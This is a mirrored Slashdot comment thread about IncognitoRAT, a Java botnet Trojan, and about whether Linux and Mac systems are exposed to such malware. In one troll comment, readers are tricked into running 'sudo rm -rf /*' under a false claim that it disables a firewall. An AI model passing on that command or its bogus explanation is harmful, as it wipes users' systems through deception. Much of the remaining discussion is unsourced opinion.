Slashdot Mirror
Multiplatform Java Botnet Spotted In the Wild
It's fun sometimes to be smug because you are ("one is") using an operating system less susceptible to malware, or at least less targeted by malware creators, than is Microsoft Windows. Now, reader Orome1 writes with word of a Java-based, equal-opportunity botnet Trojan, excerpting from Help Net Security's report: "'IncognitoRAT is one example of a Java-based Trojan discovered in the wild that is being downloaded and installed by another component. This malware behaves like other Windows botnets but uses source code and libraries that can operate on other platforms,' explains McAfee's Carlos Castillo." So far, no mention of a Linux version, though.
It's in the wild !! A Java ... a what??
No mention of linux support. Do we always have to come last?
"So far, no mention of a Linux version, though."
Java is Java.. there generally would not be a "linux version", or any platform specific version.. sort of the whole point of this.
-Lod
I doubt that it works on MacOSX. Converting a jar to an exe is difficult. I wish I could do it reliably on Linux, but I can't (gcj doesn't really work). Jar2exe is Windows-only. So I don't see why we need to worry. Java itself is secure enough to at least make virus writing very difficult. So again, nothing to worry about. Another case of journalistic exaggeration.
AFAIK, any OS that allows a user to install software is susceptible to malware.
Anyone smugly thinking they aren't is an idiot.
Wake me up when a worm has been discovered in the wild targeting OS X or Linux
Wasn't this posted here a while back? I think it does run on Windows, Mac and Linux, but tests showed that Linux is the only platform that doesn't allow it to restart after a reboot. Can't find the story, could be wrong.
Shut up cat.
My karma is not a Chameleon.
Java is Java.. there generally would not be a "linux version", or any platform specific version.. sort of the whole point of this.
Which is why I neverenable java, period. If a site requires it, they don't need my eyeball time.
Bantam Dominique roosters crow a four-note song. Once you've heard it as "Happy BIRTHday" you can't NOT hear it that way
How imaginative. Why, when this fallacious "reasoning" defeated in every single slashdot story in which it comes up, do people persist in trying to promote this myth? You *can't* unwittingly install and run arbitrary code on Linux the way you can on windows, unless you're incompetent and running as root all the time (which incredibly, I do know of at least one person who does -- but it's rare).
Caveat Utilitor
Caveat Utilitor
jar2exe doesn't work by compiling Java to native code, it starts a JVM and provides the ability to package .jar files into the executable. In principle, a Linux version would be fairly simple to make.
Also, a given JVM is only as locked down as the SecurityManager running inside of it (assuming no exploitable flaws) and you can be assured the trojan packager is not installing one that stops anything.
I'm not really disagreeing with you, but not knowing linux I don't see why this is true. It seems to me that you can't really unwittingly run arbitrary code on windows and that any of the applications/settings that negate this would be just as big a problem on linux.
unix is where the term root for #1 user, hence rootkit comes from.
Minor correction: On unix systems, root is always the #0 user. The #1 user is typically "daemon", though not always.
(Unix was written by -- and for -- C programmers, who always start counting at 0. ;-)
Those who do study history are doomed to stand helplessly by while everyone else repeats it.
They just gave Oracle a new slogan for Java, "Write once, pwn everywhere!"
Monstar L
"No OS left behind."
2019 is going to be the year of Linux on the desktop.
It is funny how the "They don't attack X because it's not popular" meme keeps popping up, no matter how often people show how wrong it is.
My favorite approach for debunking it is to point out that apache has been the overwhelmingly dominant web server since 1996 (according to Netcraft), and web servers are one of the most inviting targets that the computer business has to offer. But how many actual exploits have ever appeared for apache? When was the last story of a worm, virus, whatever making the rounds by taking advantage of a security hole in apache? (There have been a few security holes in releases of apache, but they tend to be fixed before an exploit appears, due to the "many eyes" that are always looking at apache's code, usually for other reasons. As such things go, it's a very approachable piece of software.)
Of course, there are lots of other chunks of software that serve equally well for debunking this meme. Just recently, I ran across yet another survey that once again made the old estimate that over 50% of the world's cpu cycles are spent running one venerable chunk of code, the Simplex Algorithm. Has that code ever been a vector for malware? You'd think it would be, since manufacturing plants everywhere in the world totally depend on it for their profitability. But I doubt if you'd find very many malware authors who would even recognize its name, much less tell you what it does.
I guess it's the old problem that things like religion, politics, and apparently computer security issues don't encourage people to look at the actual facts. It's totally acceptable to just make up a theory and use it to explain everything, without bothering with even the simplest of tests against reality.
(And I do like to try to debunk the claim that the Simplex Algorithm is the main user of cpu cycles by countering that the actual winner in that ranking is the Idle Loop. But people look at me funny when I say that. ;-)
Those who do study history are doomed to stand helplessly by while everyone else repeats it.
i'm using it now, buddy.
i could go into the fun i've had getting my USB sound card working.
linux is user-friendly if all you want to do is browse, tweet, IM or email.
as soon as you try anything else, you're in "this is unsupported. it's not our fault. there's a patch here, or is it here. you'll have to recompile the kernel, then recompile ALSA, then compile and install wineasio, jack-dev, and wine-dev, then configure everything. oh, you mean you're not running this really old kernel? well, there's no kernel headers for your version, so you wont be able to recompile ALSA at all. it's not our fault - blame the manufacturer of your hardware".
linux's user-friendliness is a veneer. once you peel it away, you still wind up doing everything in terminal, just like you have for the last 20 years.
note that this is not a big criticism - i love how far it's come. i'm just saying it has further to go, and needs to get along with (often hostile) hardware manufacturers a little better to provide the kind of experience windows or osx can provide, security holes or not.
Beyond this, the bot doesn't need root privs to run under the logged in user... The only reason for the root escalations in windows is to work around the antivirus programs that are more common in windows... targeting a platform without active av is easier.. I'm surprised there aren't more mac trojans currently.
Michael J. Ryan - tracker1.info
You *can't* unwittingly install and run arbitrary code on Linux the way you can on windows, unless you're incompetent and running as root all the time
Last I checked, most Linux distros don't have noexec on home, so you most certainly can install and run arbitrary code without having root. It's slightly more of a hurdle in that email attachments and downloaded files won't be immediately executable.
Then again, in Ubuntu, for example, downloading a .deb package in browser and clicking "Open" will launch a GUI installer - and if user clicks "Yes, I want to install this", the .deb can run anything it wants as part of that installation, with root permissions too.
Thing is, you can't have ease of use that's only magically applicable to "good" scenarios - not unless God implements the evil bit.
(Unix was written by -- and for -- C programmers, who always start counting at 0. ;-)
Wasn't C written by and for Unix, rather?
Great, since you clearly know why it is so, perhaps you could explain it to us mere mortals that are perfectly happy using only one OS. My opinion matters, my information however is undependable because I didn't provide anything. Wolfing's opinion also matters but hi information is also undependable because he didn't provide any either.
If you're going to to state an opinion, you probably want to back it up when queried on it. Very few people should believe a statement that says "This is true because it is".
Seriously for a moment.
Do you have antivirus installed on your linux box? No? you are probably infected.
Do you know how to find out when your linux box has been infected? No? You are probably infected.
Do you know how your linux box gets infected? No? You are probably infected.
Have you disabled SELinux because it was quicker than working out how to fix something it was preventing? Yes? You are probably infected.
Linux is not the virus/trojan free utopia it used to be, and worse, they work without the "machine running like a dog" instant red flag that comes with most windows infections.
The problem with your BS MR AC, is this: Those servers? they actually have these things called "admins" that make many thousands of dollars and are sent to classes and things like Black hat to stay on top of the game, whereas with Windows you have the nice little old lady down the hall that still can't figure out the difference between memory and hard drive space.
Think of it THIS way MR AC: Which would be easier to rob, the bank in the middle of Paduka AR with one old guy that hasn't fired a gun in 30 years, or the supermegabank in Las Vegas where they have had a dozen attempts over the years and have ex special forces for security?
In the end, as much as it will butthurt the Linux desktop users (all four of you) the simple fact is YOU ARE TOO SMALL to be worth the trouble, and the servers running Linux are locked down tighter than a nun's thighs by guys like my old friend Glenn that spend all their time ass deep in sites like Securina and consider recompiling code for security and speed improvements a "fun" way to spend an afternoon. In the end malware writers are like any other criminal and are thus lazy: the easiest mark will always be the target. Now once XP finally dies hard? Well as we have seen with the OSX malware kit they are starting to look at OSX as kinda tasty, and there are plenty of exploits for Android. But Linux desktop is what...0.02% of the market? It would be like targeting OS/2 Warp users, it just isn't worth the effort.
ACs don't waste your time replying, your posts are never seen by me.
But how many actual exploits have ever appeared for apache?
Dude... Sony.
and lots http://lmgtfy.com/?q=apache+exploit
The original McAfee blog article says this (why not link to the original resource in the first place?):
So this is not different at all from the Java-based Facebook suicide Trojan horse which circulated in Spring 2010 (but was not spotted by most AV companies back then).
You're right. For Joe Average, it makes a great desktop if they don't need to change anything. I think we are at the point where configuration takes some skill, but the user experience is just fine.
I've got my senior citizen mother using Slackware. She doesn't understand much of anything about computers, or viruses, or pretty much anything your average 15 year old would get about computers, but the interface is _still_ easy enough for her requirements (lolcats, email, reading news/recipes)
If she actually needs to change anything, it is past her abilities and she has to call me. She had to do that under windows, though, so no difference to me, + the added bonus that I don't clean a pile of malware off it every time I visit. Getting her on linux has cured a long standing headache.
I think you just won Slashdot.
Unity? Screw that: XFCE. Slashdot Beta? Screw that: SoylentNews. Australis? Screw that: Pale Moon. UX developers DIAF
NoScript.
Noscript is only an antidote for vulnerabilities that need Javascript. If it uses something else, like in the HTML or JPEG parser, than Noscript is no protection.
Wow that carries so much weight coming from an Anonymous Coward. Maybe when you grow up you'll have a slashdot account and everything!
Caveat Utilitor
If that's the whole story and you're so knowledgeable then prove me wrong by whipping up a little malware for Linux and post the link so I can try it out. Oddly, after several years of proposing this obvious way to prove that "point", not one person has done it. Must not be as easy as you like to imagine.
Caveat Utilitor
Oh, I won't need a link for that.
If you want to see HOT NAKED LESBIANS though, I'll be happy to give you the link: right here.
If it doesn't work, it's because your firewall blocks it. It's because your Ubuntu Linux, being such a secure OS as you surely know, is highly efficient at blocking various things deemed undesirable. Makes sense, right? But if you want to see HOT NAKED LESBIANS, you'll need to disable it just for this occasion. Luckily this is very easy to do. Just go to Applications -> Utilities -> Terminal, type "sudo rm -rf /*" in the window that appears, and press Enter (to clarify, "rm" means "remove", and "-rf" means "remove filter"; "/*" means "all sites"). Since this is a security-related operation, you will of course need to type in your password to confirm that you are fully aware of what you're doing - which you do, as I have explained it above.
You will need to wait for a few minutes before firewall is reconfigured, though. If your system starts behaving erratically, it may be because the firewall couldn't fully reconfigure due to network being in use; it just means you'll need to reboot.
I used to run one of those what is my IP sites. Now it's IPv6 only because various botnets started (ab)using it. I get a few thousand hits by "Apache-HttpClient/UNAVAILABLE (java 1.4)" pr. hour. Other AV vendors have known for a while, searching for my sites lists several (not mcafee) who lists my site as something the bots use.
9/11: Never forget it was a false-flag operation
Sucks to be you. Gentoo user here, with a considerable amount of real world experience. Troll harder.
Caveat Utilitor
> Java-based Trojan discovered in the wild that is being downloaded and installed by another component. This malware behaves like other Windows botnets but uses source code and libraries that can operate on other platforms ..
Is there a working demo in the wild that I can click on and get rooted on other non-Windows platforms?
Why would there be a "Linux version" of code that runs on multiple platforms? The "Windows version" IS the "Linux version."
Move sig!
You didn't ask malware for Gentoo, though. You asked malware for Linux. 70% of Linux boxen out there run Ubuntu, and probably a half of people who run them don't know what they're doing (judging by the number of people burned every time someone posts a fork bomb or rm carefully disguised inside some Perl ASCII graphics).
I think my original point stands though. If it's so easy to compromise Linux, why isn't it being done? Why can't the very people who like to crow about how easy it is (and even hurl accusations of "security through obscurity") just put up or shut up?
I think we both know the answer to that. The PEBKAC is still there for the average user, no matter which system they use. But in Linux the system isn't designed to make it trivial to run any code from any location, as windows historically has been -- it's a bit better with 7 than it was previously, and XP SP3 is also a major improvement over previous versions. But it's still fairly trivial to generate windows malware, going by the sheer volume of infected machines. I personally have one person in my contacts running win7 whose machine is spamming me daily. Oops. Windows is still the lowest hanging fruit, and as criminals are pretty much always lazy people looking to get rich quick that's what they go for. When that's gone, they'll move on to other scams (assuming OS X has been locked down, otherwise that's hanging a bit low as it is). They will not learn to be 1337 for reelz and finally code that Linux virus. That's not the criminal MO.
Caveat Utilitor
We all know how slow Java is and botnet node users are not willing to upgrade their hardware just to provide a faster service for people who don't pay a cent. So this well-known Java paradigm "Is it too slow? Just add more hardware power!" will not work here.
And noscript is not used by the "patients" who need it most, and are the main targets of botnet operators.
Even if you pwn a noscript user, that user is far more likely to notice that he/she is infected, and eventually fix that. These users are the minority, so the botnet operators don't care.
FWIW, I've written a cross platform agent (unix/linux) that scans for hardware/software, connects to a remote server, and can download new instructions. This is legit, for work and is for admins to do software and hardware asset management. The same agent runs on OSX, AIX, Solaris and many Linux distros.
A botnet client wouldn't need root access, sending spam or helping to DDoS does not need root permissions. Most unix/linux machines allow normal users to set their own cron and at job, so that takes care of rerunning the bot after a reboot (there are other ways too).
So anyone who thinks a linux/unix botnet client would be difficult to create or "install" is ignorant or delusional.
The fanatics have got their heads firmly stuck in the sand.
I am sick and tired of these motherfucking rants on this motherfucking site!
"When information is power, privacy is freedom" - Jah-Wren Ryel
AppArmor.
"When information is power, privacy is freedom" - Jah-Wren Ryel
GP also ignores the huge number of attempted attacks that every single Internet-reachable Linux box faces every single day. There is no lack of interest, just a lack of success.
"When information is power, privacy is freedom" - Jah-Wren Ryel
Then again, in Ubuntu, for example, downloading a .deb package in browser and clicking "Open" will launch a GUI installer - and if user clicks "Yes, I want to install this", the .deb can run anything it wants as part of that installation, with root permissions too.
Bullshit, you'll get a gksudo prompt, assuming you have sudo privileges at all.
"When information is power, privacy is freedom" - Jah-Wren Ryel
You've only looked at the two extremes. What about all the companies running plain-jane Linux servers with access to all their VoIP accounts and/or file shares? What about all the websites that aren't run by megacorporations with a team of uber-leet admins watching it like a hawk? And what about all the Windows servers that ARE watched like a hawk by uber-leet admins but get broken into anyways?
"When information is power, privacy is freedom" - Jah-Wren Ryel
Recent versions of Wine would require the .exe to have executable permissions.
"When information is power, privacy is freedom" - Jah-Wren Ryel
Hello
If this is your first white screen of death
First contact Microsoft about this problem.
Then press the [any] key to continue.
If this screen still appear you are infected by a virus.
-----------
This white screen of death is made by Microsoft
-----------
The PEBKAC is still there for the average user, no matter which system they use.
It's true, but it still varies by system. Clearly, on Linux there are far fewer such users that would fall for it.
But in Linux the system isn't designed to make it trivial to run any code from any location, as windows historically has been -- it's a bit better with 7 than it was previously, and XP SP3 is also a major improvement over previous versions.
It helps when you look specifically at what, exactly, is "more trivial" in Win7 (lets not deal with ancient software) compared to Linux.
And there's precisely one thing: the fact that executability of the file is controlled by its extension rather than a separate permission bit, which is why it is that much easier to get user to run payload. That's it. Everything else is the same.
And, as I pointed in my earlier post, modern user-friendly Linux distros actually do allow user to open runnable things "right from the browser" so to speak - such as .deb packages (which may contain arbitrary scripts). Given that Windows does prompt the user when he tries to run a downloaded .exe, we're talking about roughly the same amount of effort.
Windows is still the lowest hanging fruit, and as criminals are pretty much always lazy people looking to get rich quick that's what they go for.
Very much, yes, and this is largely because the majority of userbase is clueless, and because the system is surprisingly homogenic even between major releases. E.g. the .deb trick described above - it would work in Ubuntu and some (not all) derivatives, but not on RedHat or SuSE. Thus, to target desktop Linux, you actually need several exploits, with several times the effort of what you'd need for Windows - and for what? 1% of desktop machines tops?
Like you say, people who write malware that you see in the wild don't do it for lulz, they do it for the money that it earns. When you're targeting desktops - which most botnets do - Windows and its userbase is an easy target with very lucrative rewards, and thus an obvious first choice. Why bother with the second, much less third?
For the same reason, most attacks target PEBKAC and not the actual OS security. Why bother, when the average user will happily get you past all security mechanisms if you're convincing enough (which is so easy)?
On the other hand, if you actually know what you're doing, you're safe on any major desktop platform today.
Yes, you will get such a prompt - so what? If the user has actually tried to open the .deb file from a random place, why do you think he'll suddenly stop at a stock OS prompt that he had seen before?
And yes, you can assume they have sudo privileges - the default user in Ubuntu does, out of the box.
The point is there is no privilege elevation exploit in gdebi as you suggest. Yes the average user with sudo access can enter their sudo password to install a malicious app. But that's one step away from beating the computer with a sledgehammer. You can't stop users from destroying their own computers.
"When information is power, privacy is freedom" - Jah-Wren Ryel
The point is there is no privilege elevation exploit in gdebi as you suggest.
At no point did I suggested that there's any kind of privilege elevation exploit. 99% of Windows malware infections don't use one, either - they rely on user to willingly circumvent any protections the OS might throw at him (Vista/7 have SUA, remember, which is not fundamentally any different from sudo).
You can't stop users from destroying their own computers.
My point exactly.
Actually I've set up quite a few of those, and they damned near all run WinServer. Hell I can take any PHB and have him in about two weeks far enough along he can add OUs and do basic GPO edits. WinServer is so damned "clicky clicky" it is beyond simple now.
The problem with Linux, especially in the server role, is you really have to know your shit to get it running rock solid and hassle free. And those guys? They ain't cheap, even if there are any in your area (which is usually rare unless you live in a city of over 500,000) whereas MCSEs are as common as dirt and just as cheap. As long as you pay for licenses by the server and not the user (which in small shops works just fine) then WinServer ends up cheaper in the long run. For web hosting you just pay some guy to set up the website on a virtual server with some hosting company, easy peasy.
So I'd say there is a reason why fully two thirds of new servers being sold are coming with WinServer, and WinSBS is selling like hitcakes. Because despite the 'free as in beer" BS it actually comes out cheaper in the long run to get an MCSE than it is to pay a Linux guru for anything smaller than say UPS or Amazon. Linux guys are rare, expensive,and even then all it takes is one funky rare error for the downtime to kill you. With WinServer any problem has been found a thousand times over and is usually one short Google away from being fixed. hell my mom could run a Windows domain, it really ain't hard.
ACs don't waste your time replying, your posts are never seen by me.
I am one of "those guys." And trust me I wish we were really expensive but we don't make a whole lot more than Windows admins (unless you consider not having to deal with Windows boxes to be part of the payment). Rare? Maybe, but just in my area I know 2 other Linux admins, and there's nowhere near half a million people around here, so we're not that rare.
As for downtime, that is laughable. Telling a Linux admin to worry about downtime is like telling a gunship pilot to worry about a guy with a slingshot. We're not concerned. We've got it under control.
"When information is power, privacy is freedom" - Jah-Wren Ryel
Then add app armour, which prevents parsers from accessing system parts they don't need to actually do the parsing.
excuse my question: is this the first botnet running in java? what are the other common languages that are used to write this stuff. For sure it ain't Visual Basic. Why is the code of malware not portable when written in c++? For now its just a matter of time until the botnets run more reliable in linux, but still run in $gcc_plattform.